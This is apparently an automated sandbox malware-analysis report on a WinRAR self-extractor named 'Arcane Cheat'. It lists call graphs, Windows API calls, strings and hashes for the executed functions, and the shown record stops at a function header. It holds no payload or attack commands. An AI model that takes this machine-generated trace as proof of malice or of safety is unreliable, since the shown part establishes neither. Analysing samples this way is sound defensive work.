83bfe8 22982->22983 22998 82400a 22983->22998 22984->22980 22986->22980 22988 83c01d MoveFileW 22988->22980 22989 83c035 MoveFileExW 22988->22989 22989->22980 22990->22979 22990->22980 22997 82b4f7 52 API calls 2 library calls 22990->22997 22991->22980 22993 83aa40 22992->22993 22994 83aaf3 ExpandEnvironmentStringsW 22993->22994 22995 83ab16 22993->22995 22994->22995 22995->22980 22996->22980 22997->22990 23040 823fdd 22998->23040 23001->22980 23002->22980 23003->22980 23005 848606 23004->23005 23006 848613 23005->23006 23007 84861e 23005->23007 23112 848518 23006->23112 23009 848626 23007->23009 23015 84862f __CreateFrameInfo 23007->23015 23010 8484de _free 20 API calls 23009->23010 23013 84861b 23010->23013 23011 848634 23119 84895a 20 API calls __dosmaperr 23011->23119 23012 848659 HeapReAlloc 23012->23013 23012->23015 23013->22980 23015->23011 23015->23012 23120 8471ad 7 API calls 2 library calls 23015->23120 23019 83ce2c ___scrt_get_show_window_mode 23017->23019 23018 83d08a 23018->22964 23019->23018 23020 83cf1b 23019->23020 23126 8317ac CompareStringW 23019->23126 23123 82a180 23020->23123 23024 83cf4f ShellExecuteExW 23024->23018 23031 83cf62 23024->23031 23026 83cf47 23026->23024 23027 83cf9b 23128 83d2e6 6 API calls 23027->23128 23028 83cff1 CloseHandle 23029 83cfff 23028->23029 23030 83d00a 23028->23030 23129 8317ac CompareStringW 23029->23129 23030->23018 23036 83d081 ShowWindow 23030->23036 23031->23027 23031->23028 23033 83cf91 ShowWindow 23031->23033 23033->23027 23035 83cfb3 23035->23028 23037 83cfc6 GetExitCodeProcess 23035->23037 23036->23018 23037->23028 23038 83cfd9 23037->23038 23038->23028 23041 823ff4 ___scrt_initialize_default_local_stdio_options 23040->23041 23044 845759 23041->23044 23047 843837 23044->23047 23048 843877 23047->23048 23049 84385f 23047->23049 23048->23049 23051 84387f 23048->23051 23064 84895a 20 API calls __dosmaperr 23049->23064 23066 843dd6 23051->23066 23052 843864 23065 848839 26 API calls _abort 23052->23065 23056 84386f 23057 83ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23056->23057 23059 823ffe GetFileAttributesW 23057->23059 23059->22983 23059->22988 23060 843907 23075 844186 51 API calls 4 library calls 23060->23075 23063 843912 23076 843e59 20 API calls _free 23063->23076 23064->23052 23065->23056 23067 843df3 23066->23067 23073 84388f 23066->23073 23067->23073 23077 848fa5 GetLastError 23067->23077 23069 843e14 23098 8490fa 38 API calls __cftof 23069->23098 23071 843e2d 23099 849127 38 API calls __cftof 23071->23099 23074 843da1 20 API calls 2 library calls 23073->23074 23074->23060 23075->23063 23076->23056 23078 848fc7 23077->23078 23079 848fbb 23077->23079 23101 8485a9 20 API calls 3 library calls 23078->23101 23100 84a61b 11 API calls 2 library calls 23079->23100 23082 848fc1 23082->23078 23084 849010 SetLastError 23082->23084 23083 848fd3 23085 848fdb 23083->23085 23108 84a671 11 API calls 2 library calls 23083->23108 23084->23069 23102 8484de 23085->23102 23088 848ff0 23088->23085 23090 848ff7 23088->23090 23089 848fe1 23091 84901c SetLastError 23089->23091 23109 848e16 20 API calls __dosmaperr 23090->23109 23110 848566 38 API calls _abort 23091->23110 23093 849002 23095 8484de _free 20 API calls 23093->23095 23097 849009 23095->23097 23097->23084 23097->23091 23098->23071 23099->23073 23100->23082 23101->23083 23103 848512 _free 23102->23103 23104 8484e9 RtlFreeHeap 23102->23104 23103->23089 23104->23103 23105 8484fe 23104->23105 23111 84895a 20 API calls __dosmaperr 23105->23111 23107 848504 GetLastError 23107->23103 23108->23088 23109->23093 23111->23107 23113 848556 23112->23113 23117 848526 __CreateFrameInfo 23112->23117 23122 84895a 20 API calls __dosmaperr 23113->23122 23115 848541 RtlAllocateHeap 23116 848554 23115->23116 23115->23117 23116->23013 23117->23113 23117->23115 23121 8471ad 7 API calls 2 library calls 23117->23121 23119->23013 23120->23015 23121->23117 23122->23116 23130 82a194 23123->23130 23126->23020 23127 82b239 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW CharUpperW 23127->23026 23128->23035 23129->23030 23138 83e360 23130->23138 23133 82a1b2 23140 82b66c 23133->23140 23134 82a189 23134->23024 23134->23127 23136 82a1c6 23136->23134 23137 82a1ca GetFileAttributesW 23136->23137 23137->23134 23139 82a1a1 GetFileAttributesW 23138->23139 23139->23133 23139->23134 23141 82b679 23140->23141 23149 82b683 23141->23149 23150 82b806 CharUpperW 23141->23150 23143 82b692 23151 82b832 CharUpperW 23143->23151 23145 82b6a1 23146 82b6a5 23145->23146 23147 82b71c GetCurrentDirectoryW 23145->23147 23152 82b806 CharUpperW 23146->23152 23147->23149 23149->23136 23150->23143 23151->23145 23152->23149 24860 826110 80 API calls 24861 84b710 GetProcessHeap 24862 83be49 108 API calls 4 library calls 24810 821025 29 API calls pre_c_initialization 23168 829f2f 23169 829f44 23168->23169 23170 829f3d 23168->23170 23171 829f4a GetStdHandle 23169->23171 23178 829f55 23169->23178 23171->23178 23172 829fa9 WriteFile 23172->23178 23173 829f7a 23174 829f7c WriteFile 23173->23174 23173->23178 23174->23173 23174->23178 23176 82a031 23180 827061 75 API calls 23176->23180 23178->23170 23178->23172 23178->23173 23178->23174 23178->23176 23179 826e18 60 API calls 23178->23179 23179->23178 23180->23170 24811 83a430 73 API calls 24868 83be49 103 API calls 4 library calls 24870 83be49 98 API calls 3 library calls 24812 83ec40 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 24813 838c40 GetClientRect 24814 843040 5 API calls 2 library calls 24815 850040 IsProcessorFeaturePresent 24871 83d34e DialogBoxParamW 24872 839b50 GdipDisposeImage GdipFree ___InternalCxxFrameHandler 24818 848050 8 API calls ___vcrt_uninitialize 23949 829b59 23950 829b63 23949->23950 23951 829bd7 23949->23951 23952 829bad SetFilePointer 23950->23952 23952->23951 23953 829bcd GetLastError 23952->23953 23953->23951 24820 83fc60 51 API calls 2 library calls 24822 843460 RtlUnwind 24823 849c60 71 API calls _free 24824 849e60 31 API calls 2 library calls 24759 83d573 24760 83d580 24759->24760 24761 82ddd1 53 API calls 24760->24761 24762 83d594 24761->24762 24763 82400a _swprintf 51 API calls 24762->24763 24764 83d5a6 SetDlgItemTextW 24763->24764 24765 83ac74 5 API calls 24764->24765 24766 83d5c3 24765->24766 24828 835c77 121 API calls __vswprintf_c_l 24829 821075 82 API calls pre_c_initialization

                                  Executed Functions

                                  Function 0083D5D4 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 197filesleeptimeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 008300CF: GetModuleHandleW.KERNEL32(kernel32), ref: 008300E4
                                    • Part of subcall function 008300CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 008300F6
                                    • Part of subcall function 008300CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00830127
                                    • Part of subcall function 00839DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00839DAC
                                    • Part of subcall function 0083A335: OleInitialize.OLE32(00000000), ref: 0083A34E
                                    • Part of subcall function 0083A335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0083A385
                                    • Part of subcall function 0083A335: SHGetMalloc.SHELL32(00868430), ref: 0083A38F
                                    • Part of subcall function 008313B3: GetCPInfo.KERNEL32(00000000,?), ref: 008313C4
                                    • Part of subcall function 008313B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 008313D8
                                  • GetCommandLineW.KERNEL32 ref: 0083D61C
                                  • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0083D643
                                  • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0083D654
                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0083D68E
                                    • Part of subcall function 0083D287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0083D29D
                                    • Part of subcall function 0083D287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0083D2D9
                                  • CloseHandle.KERNEL32(00000000), ref: 0083D697
                                  • GetModuleFileNameW.KERNEL32(00000000,0087DC90,00000800), ref: 0083D6B2
                                  • SetEnvironmentVariableW.KERNEL32(sfxname,0087DC90), ref: 0083D6BE
                                  • GetLocalTime.KERNEL32(?), ref: 0083D6C9
                                  • _swprintf.LIBCMT ref: 0083D708
                                  • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0083D71A
                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0083D721
                                  • LoadIconW.USER32(00000000,00000064), ref: 0083D738
                                  • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 0083D789
                                  • Sleep.KERNEL32(?), ref: 0083D7B7
                                  • DeleteObject.GDI32 ref: 0083D7F0
                                  • DeleteObject.GDI32(?), ref: 0083D800
                                  • CloseHandle.KERNEL32 ref: 0083D843
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                  • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                  • API String ID: 788466649-3743209390
                                  • Opcode ID: 6db6ef52642b98f1a5897d90305afdabcc174e2cdfa557af3c2b53a25f9a0a24
                                  • Instruction ID: cd44a4254a36370eed86e4b235efd7601cdedd002e51f4b13ad26542ebe420de
                                  • Opcode Fuzzy Hash: 6db6ef52642b98f1a5897d90305afdabcc174e2cdfa557af3c2b53a25f9a0a24
                                  • Instruction Fuzzy Hash: 2761E171900701AFD321ABB9EC49F2B37A8FB84745F000429F549D2291EFB8D944CBE6
                                  Function 00839E1C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100memorywindowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 770 839e1c-839e38 FindResourceW 771 839f2f-839f32 770->771 772 839e3e-839e50 SizeofResource 770->772 773 839e52-839e61 LoadResource 772->773 774 839e70-839e72 772->774 773->774 775 839e63-839e6e LockResource 773->775 776 839f2e 774->776 775->774 777 839e77-839e8c GlobalAlloc 775->777 776->771 778 839e92-839e9b GlobalLock 777->778 779 839f28-839f2d 777->779 780 839f21-839f22 GlobalFree 778->780 781 839ea1-839ebf call 83f4b0 778->781 779->776 780->779 785 839ec1-839ee3 call 839d7b 781->785 786 839f1a-839f1b GlobalUnlock 781->786 785->786 791 839ee5-839eed 785->791 786->780 792 839f08-839f16 791->792 793 839eef-839f03 GdipCreateHBITMAPFromBitmap 791->793 792->786 793->792 794 839f05 793->794 794->792
                                  APIs
                                  • FindResourceW.KERNEL32(0083AE4D,PNG,?,?,?,0083AE4D,00000066), ref: 00839E2E
                                  • SizeofResource.KERNEL32(00000000,00000000,?,?,?,0083AE4D,00000066), ref: 00839E46
                                  • LoadResource.KERNEL32(00000000,?,?,?,0083AE4D,00000066), ref: 00839E59
                                  • LockResource.KERNEL32(00000000,?,?,?,0083AE4D,00000066), ref: 00839E64
                                  • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0083AE4D,00000066), ref: 00839E82
                                  • GlobalLock.KERNEL32(00000000,?,?,?,?,?,0083AE4D,00000066), ref: 00839E93
                                  • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00839EFC
                                  • GlobalUnlock.KERNEL32(00000000), ref: 00839F1B
                                  • GlobalFree.KERNEL32(00000000), ref: 00839F22
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
                                  • String ID: PNG
                                  • API String ID: 4097654274-364855578
                                  • Opcode ID: 48895af06f7296106ee516933c3862227a6b1d65084076bb8c2119ad0bfb9f5e
                                  • Instruction ID: 542e0f085767474c10041b33a7f7d36f2c0e5167532c6d5353a28eebea98c35e
                                  • Opcode Fuzzy Hash: 48895af06f7296106ee516933c3862227a6b1d65084076bb8c2119ad0bfb9f5e
                                  • Instruction Fuzzy Hash: CE318175204716AFD7119F35EC4891BBBA9FF85792F040518F982D2260EFB5DC008AA1
                                  Function 0082A5F4 Relevance: 7.6, APIs: 5, Instructions: 107fileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 971 82a5f4-82a61f call 83e360 974 82a691-82a69a FindNextFileW 971->974 975 82a621-82a632 FindFirstFileW 971->975 978 82a6b0-82a6b2 974->978 979 82a69c-82a6aa GetLastError 974->979 976 82a6b8-82a75c call 82fe56 call 82bcfb call 830e19 * 3 975->976 977 82a638-82a64f call 82b66c 975->977 981 82a761-82a774 976->981 986 82a651-82a668 FindFirstFileW 977->986 987 82a66a-82a673 GetLastError 977->987 978->976 978->981 979->978 986->976 986->987 989 82a684 987->989 990 82a675-82a678 987->990 993 82a686-82a68c 989->993 990->989 992 82a67a-82a67d 990->992 992->989 995 82a67f-82a682 992->995 993->981 995->993
                                  APIs
                                  • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0082A4EF,000000FF,?,?), ref: 0082A628
                                  • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0082A4EF,000000FF,?,?), ref: 0082A65E
                                  • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0082A4EF,000000FF,?,?), ref: 0082A66A
                                  • FindNextFileW.KERNEL32(?,?,?,?,?,?,0082A4EF,000000FF,?,?), ref: 0082A692
                                  • GetLastError.KERNEL32(?,?,?,?,0082A4EF,000000FF,?,?), ref: 0082A69E
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: FileFind$ErrorFirstLast$Next
                                  • String ID:
                                  • API String ID: 869497890-0
                                  • Opcode ID: 379564ab7436c39d92cf2f59004da699e6a09ec2cfc18cf48dd686f1f12f9054
                                  • Instruction ID: fa4a265643693f19eeca49582daffb9e682845587b30fd3401634160d424c200
                                  • Opcode Fuzzy Hash: 379564ab7436c39d92cf2f59004da699e6a09ec2cfc18cf48dd686f1f12f9054
                                  • Instruction Fuzzy Hash: C9417675504755AFC324EF68D884ADAF7E8FF58341F040929F5D9D3240D734A9988B92
                                  Function 0084753D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000000,?,00847513,00000000,0085BAD8,0000000C,0084766A,00000000,00000002,00000000), ref: 0084755E
                                  • TerminateProcess.KERNEL32(00000000,?,00847513,00000000,0085BAD8,0000000C,0084766A,00000000,00000002,00000000), ref: 00847565
                                  • ExitProcess.KERNEL32 ref: 00847577
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: Process$CurrentExitTerminate
                                  • String ID:
                                  • API String ID: 1703294689-0
                                  • Opcode ID: f5ccff95dec047274871379fdcc7de48c37850be000b1336471748703ee8d32f
                                  • Instruction ID: 40a2d76e5ac8327e5120f00c90660b56c52bbcb3bf93c297887643befb5ce472
                                  • Opcode Fuzzy Hash: f5ccff95dec047274871379fdcc7de48c37850be000b1336471748703ee8d32f
                                  • Instruction Fuzzy Hash: AAE0B631004A4CAFCF11AF68DD09A493F6AFB44792F118424F9098E262CB3ADE52CB51
                                  Function 0082857B Relevance: 3.9, APIs: 2, Instructions: 947COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: H_prolog_memcmp
                                  • String ID:
                                  • API String ID: 3004599000-0
                                  • Opcode ID: e2ff427b803a6b4fa23bd00fcd48bc4e57e8148c4559b13d632351c3768670a1
                                  • Instruction ID: fcfbe094fa65f8594a9eea66d6c68ee47986bfda0bb08d39fe102d8e4fd74e08
                                  • Opcode Fuzzy Hash: e2ff427b803a6b4fa23bd00fcd48bc4e57e8148c4559b13d632351c3768670a1
                                  • Instruction Fuzzy Hash: E882F970905265EEDF25DB64D885BFAB7A9FF15300F0840B9E899DB142DB305AC8CB61
                                  Function 0083AEE0 Relevance: 98.7, APIs: 47, Strings: 9, Instructions: 724COMMON
                                  Download Yara Rule
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 0083AEE5
                                    • Part of subcall function 0082130B: GetDlgItem.USER32(00000000,00003021), ref: 0082134F
                                    • Part of subcall function 0082130B: SetWindowTextW.USER32(00000000,008535B4), ref: 00821365
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: H_prologItemTextWindow
                                  • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                  • API String ID: 810644672-8108337
                                  • Opcode ID: 6b464d04de6a39f8c82cbae417964a097bf20045fde5ea7bf23717e2a29bcc2d
                                  • Instruction ID: ccf74f6ed3c4307a95887ea86d78ce0e5631e51d3441e335963f51e37920f219
                                  • Opcode Fuzzy Hash: 6b464d04de6a39f8c82cbae417964a097bf20045fde5ea7bf23717e2a29bcc2d
                                  • Instruction Fuzzy Hash: E64202B0944254AFEB21ABA89C8AFBE7B7CFB41704F000154F745E61D1CFB85984CBA6
                                  Function 008300CF Relevance: 51.1, APIs: 22, Strings: 7, Instructions: 317libraryfileloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 257 8300cf-8300ee call 83e360 GetModuleHandleW 260 8300f0-830107 GetProcAddress 257->260 261 830154-8303b2 257->261 262 830121-830131 GetProcAddress 260->262 263 830109-83011f 260->263 264 830484-8304b3 GetModuleFileNameW call 82bc85 call 82fe56 261->264 265 8303b8-8303c3 call 8470dd 261->265 262->261 266 830133-830152 262->266 263->262 280 8304b5-8304bf call 82acf5 264->280 265->264 274 8303c9-8303fa GetModuleFileNameW CreateFileW 265->274 266->261 276 830478-83047f CloseHandle 274->276 277 8303fc-83040a SetFilePointer 274->277 276->264 277->276 278 83040c-830429 ReadFile 277->278 278->276 281 83042b-830450 278->281 285 8304c1-8304c5 call 830085 280->285 286 8304cc 280->286 284 83046d-830476 call 82fbd8 281->284 284->276 294 830452-83046c call 830085 284->294 291 8304ca 285->291 289 8304ce-8304d0 286->289 292 8304f2-830518 call 82bcfb GetFileAttributesW 289->292 293 8304d2-8304f0 CompareStringW 289->293 291->289 296 83051a-83051e 292->296 301 830522 292->301 293->292 293->296 294->284 296->280 300 830520 296->300 302 830526-830528 300->302 301->302 303 830560-830562 302->303 304 83052a 302->304 305 830568-83057f call 82bccf call 82acf5 303->305 306 83066f-830679 303->306 307 83052c-830552 call 82bcfb GetFileAttributesW 304->307 317 830581-8305e2 call 830085 * 2 call 82ddd1 call 82400a call 82ddd1 call 839f35 305->317 318 8305e7-83061a call 82400a AllocConsole 305->318 312 830554-830558 307->312 313 83055c 307->313 312->307 315 83055a 312->315 313->303 315->303 323 830667-830669 ExitProcess 317->323 318->323 324 83061c-830661 GetCurrentProcessId AttachConsole call 8435b3 GetStdHandle WriteConsoleW Sleep FreeConsole 318->324 324->323
                                  APIs
                                  • GetModuleHandleW.KERNEL32(kernel32), ref: 008300E4
                                  • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 008300F6
                                  • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00830127
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 008303D4
                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008303F0
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00830402
                                  • ReadFile.KERNEL32(00000000,?,00007FFE,00853BA4,00000000), ref: 00830421
                                  • CloseHandle.KERNEL32(00000000), ref: 00830479
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0083048F
                                  • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 008304E7
                                  • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00830510
                                  • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 0083054A
                                    • Part of subcall function 00830085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008300A0
                                    • Part of subcall function 00830085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0082EB86,Crypt32.dll,00000000,0082EC0A,?,?,0082EBEC,?,?,?), ref: 008300C2
                                  • _swprintf.LIBCMT ref: 008305BE
                                  • _swprintf.LIBCMT ref: 0083060A
                                    • Part of subcall function 0082400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0082401D
                                  • AllocConsole.KERNEL32 ref: 00830612
                                  • GetCurrentProcessId.KERNEL32 ref: 0083061C
                                  • AttachConsole.KERNEL32(00000000), ref: 00830623
                                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00830649
                                  • WriteConsoleW.KERNEL32(00000000), ref: 00830650
                                  • Sleep.KERNEL32(00002710), ref: 0083065B
                                  • FreeConsole.KERNEL32 ref: 00830661
                                  • ExitProcess.KERNEL32 ref: 00830669
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                                  • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                  • API String ID: 1201351596-3298887752
                                  • Opcode ID: 416cfc3dee3cd7cd516e09ff828539eba401195b927ef58e58d8c5c5286cc88e
                                  • Instruction ID: 1848c2e80a204195f8650d96d182fd657d5eea68e6e371321e4ebd97798ac29f
                                  • Opcode Fuzzy Hash: 416cfc3dee3cd7cd516e09ff828539eba401195b927ef58e58d8c5c5286cc88e
                                  • Instruction Fuzzy Hash: F6D172B1008784ABD7219F94D859B9FBBF8FB84786F10091DFA85D6180DBB4864C8F93
                                  Function 0083BDF5 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 429windowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
